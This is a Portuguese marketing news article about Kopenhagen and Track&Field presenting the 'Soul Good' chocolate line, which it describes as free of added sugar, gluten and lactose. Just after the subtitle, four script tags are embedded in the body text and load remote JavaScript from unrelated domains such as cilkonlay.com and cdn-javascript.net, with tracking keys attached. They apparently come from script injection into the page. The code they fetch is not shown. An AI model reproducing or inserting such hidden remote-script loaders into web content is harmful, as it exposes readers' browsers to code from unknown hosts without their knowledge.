Experiência de Marca

Kopenhagen se junta à Track&Field para apresentar chocolates saudáveis

Parceria entre marcas mira público ávido por alimentos saudáveis e saborosos, mercado que cresce 25% por ano no Brasil e movimenta US$ 35 bilhões. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573168843643" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Parceria entre marcas mira público ávido por alimentos saudáveis e saborosos, mercado que cresce 25% por ano no Brasil e movimenta US$ 35 bilhões.

É cada vez maior o número de pessoas que buscam um estilo de vida mais equilibrado, integrando alimentos saudáveis e saborosos às dietas.

As últimas novidades do mercado de live marketing estão aqui.

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Para mostrar que ser fitness e comer chocolates apetitosos não são comportamentos contraditórios, a Kopenhagen se uniu à Track&Field para apresentar a nova plataforma de negócios Soul Good.

No dia 10 de novembro, após o Santander T&F Run Series, os atletas de São Caetano (SP) irão conhecer e degustar as novidades na arena de ativação, que será realizada no Park Shopping São Caetano.

Com a assinatura “Soul Good é saudável. Mas é muito mais do que isso”, a linha de chocolates lança no mercado produtos clean label, zero adição de açúcares, sem glúten, lactose, adoçantes ou corantes artificiais, com ingredientes naturais selecionados, que garantem ao chocolate o sabor único e delicioso da Kopenhagen.

“A Kopenhagen quer conquistar espaço de vez no dia a dia dos brasileiros.”, explica Renata Moraes Vichi, vice-presidente do Grupo CRM e uma das responsáveis e grande incentivadora para a criação da plataforma.

Renata Moraes Vichi.

O segmento de alimentos saudáveis movimenta no País cerca de US$ 35 bilhões ao ano, de acordo com o Euromonitor. Nos países mais desenvolvidos, esse nicho é mais antigo, e, por essa razão, está estabilizado, crescendo 6% ao ano.

No Brasil, o mercado está em franca expansão e tem crescido na faixa de 25% anualmente. “Mais que uma nova linha, essa é uma plataforma de negócios que tem enorme potencial de expansão e carrega a inovação presente nos 91 anos de história da marca.”, salienta a executiva.

 A Soul Good é composta por seis produtos – entre tabletes 70% cacau, bombons (maciços e recheados) nas já consagradas versões Lajotinha e Língua de Gato – e estão disponíveis em todas as lojas Kopenhagen do Brasil. “Soul Good veio para ser a escolha certeira do consumidor que quer aliar em uma só mordida o sabor e a textura de um dos melhores chocolates do mundo, envelopado em uma combinação de ingredientes naturais e nutricionalmente ricos.”, finaliza Renata.